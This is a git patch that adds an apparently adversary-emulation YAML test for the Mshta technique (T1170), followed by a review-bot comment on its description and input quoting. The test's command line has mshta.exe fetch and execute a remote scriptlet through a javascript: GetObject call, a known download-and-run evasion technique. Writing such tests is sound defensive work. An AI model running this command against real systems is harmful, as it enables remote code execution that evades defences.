From 280b356f5766d2d6ff91a28bded1500dc0ec888e Mon Sep 17 00:00:00 2001
From: Brian Beyer
Date: Sat, 12 May 2018 23:28:38 +0200
Subject: [PATCH] add ${T}
---
atomics/t1170/t1170.yaml | 18 ++++++++++++++++++
1 file changed, 18 insertions(+)
create mode 100644 atomics/t1170/t1170.yaml
diff --git a/atomics/t1170/t1170.yaml b/atomics/t1170/t1170.yaml
new file mode 100644
index 00000000..8cc1478f
--- /dev/null
+++ b/atomics/t1170/t1170.yaml
@@ -0,0 +1,18 @@
+attack_technique: T1170
+display_name: Mshta
+
+atomic_tests:
+- name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
+ description: |
+ Test execution of a remote script using mshta.exe
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_url:
+ description: location of the payload
+ type: Url
+ default: https://www.example.com/mshta.sct
+ executor:
+ name: command_prompt
+ command: |
+ mshta.exe javascript:a=GetObject("script:#{file_url}").Exec();close();
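Review bot: The `description` on the new test says only that a remote script is executed, which leaves out what an operator needs to run it safely and what a defender should look for afterwards. The `file_url` default is a placeholder on example.com, and the value is substituted verbatim into the double-quoted `script:` string on a `command_prompt` line, so a value containing `"` or `&` would change the command that actually runs. I would extend the test description to something like `mshta.exe fetches and runs the scriptlet at file_url; point it at a benign file you host. Expect an mshta.exe process with a javascript: command line and an outbound connection to that host.` The `file_url` description could also say `URL of a benign scriptlet you control; plain URL only, no quotes or shell metacharacters`.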